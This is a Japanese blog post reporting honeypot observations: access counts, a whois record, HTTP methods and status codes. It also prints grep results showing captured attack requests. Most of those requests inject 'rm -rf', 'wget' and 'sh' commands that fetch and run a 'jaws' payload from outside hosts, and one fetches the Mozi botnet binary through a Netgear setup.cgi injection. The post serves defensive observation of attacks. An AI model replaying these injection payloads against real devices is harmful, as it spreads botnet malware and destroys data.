３月２０日〜３月２７日までのハニーポットへのアクセスレポート。

• アクセス数
• ipアドレス別アクセス数
• HTTPリクエストメソッド
• HTTPステータスコード
• HTTP アクセスURL数
• ハニーポット参考書籍

アクセス数

週刊アクセス数です。
今週は１００程度のアクセスがデイリーでありました。
３月２６日（土）に６００アクセスを超えました。

ipアドレス別アクセス数

31.184.197.10のアクセスが６００近くありますね。
おそらく、３月２６日のアクセスはこのipアドレスによるものでしょう。
ちなみに31.184.197.10はロシアからのアクセスです。

inetnum: 31.184.192.0 - 31.184.199.255
netname: PIN-DATACENTER-NET
descr: public vlans of DC
country: RU　　　→　（ロシア連邦）
org: ORG-PINl1-RIPE
admin-c: PIN44050-RIPE
tech-c: PIN44050-RIPE
mnt-routes: MNT-PINSUPPORT
status: ASSIGNED PA
mnt-by: MNT-PIN
mnt-domains: MNT-PINSUPPORT
mnt-by: MNT-PINSUPPORT
created: 2015-07-19T21:06:36Z l
ast-modified: 2019-02-28T11:13:27Z
source: RIPE

HTTPリクエストメソッド

HEADメソッドが最も多いです。
しっかりとヘッダ情報を見てからの攻撃をしているケースが今週は多いです。
CONNECT、GETも多いアクセスの週となりました。

HTTPステータスコード

401のアクセスが多く権限奪取が多そうです。

HTTP アクセスURL数

ハニーポット参考書籍

WOWHoneypotの遊びかた　“おもてなし”機能でサイバー攻撃を観察する！ (技術の泉シリーズ（NextPublishing）)

• 作者:森久 和昭
• インプレスR&D

Amazon

ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。
しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事によりログ分析ができていませんでした。
そのため、現時点で３日分のログしか溜まっていません（えっ！？

それでも、すでに数千アクセス来ているのでログを見ていこうと思います。

今日は、wgetしてくる攻撃をピンポイントで抽出します。
ログファイルを書きコマンドで抽出します。[1]

$ grep -i wget access_log

結果

検索件数：10件

[2022-03-15 13:14:01+0900] 114.226.253.242 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：中国

[2022-03-15 14:34:46+0900] 203.150.51.169 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：タイ

[2022-03-16 06:10:01+0900] 131.0.140.63 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：アメリカ（国情報なし）

[2022-03-16 15:57:33+0900] 124.152.185.167 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：中国

[2022-03-16 17:58:34+0900] 189.124.119.77 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：アメリカ（国情報なし）

[2022-03-16 18:39:56+0900] 41.237.6.136 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：エジプト

[2022-03-17 09:28:28+0900] 41.44.63.246 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：エジプト

[2022-03-17 15:03:33+0900] 45.224.170.52 blank:80 "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.224.170.52:57274/Mozi.m+-

ipアドレスの国：アメリカ（国情報なし）

[2022-03-17 18:09:42+0900] 187.144.73.98 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

 ipアドレスの国：メキシコ

[2022-03-17 19:15:47+0900] 106.253.189.123 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国：韓国

ipアドレスの国を調べるとさまざまな国から攻撃を受けています。
中国、アメリカ、アフリカ、タイ、韓国とバラエティに富んでいます。
今回の攻撃は、wgetでマルウェアかなんかをダウンロードして仕込もうとしています。
wgetの前に必ずcd+/tmp;rm+-rf+*;があるのは、アタックした痕跡を消しにかかっています。
ここらへんはもうテンプレの攻撃でしょうね。
しかも、wgetにはjawsの文字列が必ずあります。
これはHTTPのコマンドインジェクションのようです。[2]

こんな感じでハニーポットのログ分析で攻撃の観測をレポートしていきます。

参考記事

[1] grepコマンドの詳細まとめました【Linuxコマンド集】

[2]複数の脆弱性を利用してルータやデバイスを狙うボット型マルウェアの新亜種を確認 | トレンドマイクロ セキュリティブログ

ハニーポット関連書籍

ハニーポットを作ってみたい場合は下記書籍を参考にすると良いと思います。

WOWHoneypotの遊びかた　“おもてなし”機能でサイバー攻撃を観察する！ (技術の泉シリーズ（NextPublishing）)

• 作者:森久 和昭
• インプレスR&D

Amazon

月初めでログを集計するスクリプトが動いてるか確認する時に間違えて、コマンドを打ってしまいログが消えました・・・

上ボタンで過去に打ったコマンドを使おうとして、放ったコマンド。

$ sed -i '' -e 'd' hoge.txt

ログファイルが消えてった・・・・

今月のログ集計は諦めて、また今日からログを取ってレポートしていきますT T

サーバーがパンクするほど１月ではログ溜まらないから、集計して取った段階で手動でログをリフレッシュするほうが良いかと反省。

みなさんも気をつけましょう！！

バックアップは大事！！

参考書籍

WOWHoneypotの遊びかた　“おもてなし”機能でサイバー攻撃を観察する！ (技術の泉シリーズ（NextPublishing）)

• 作者:森久 和昭
• インプレスR&D

Amazon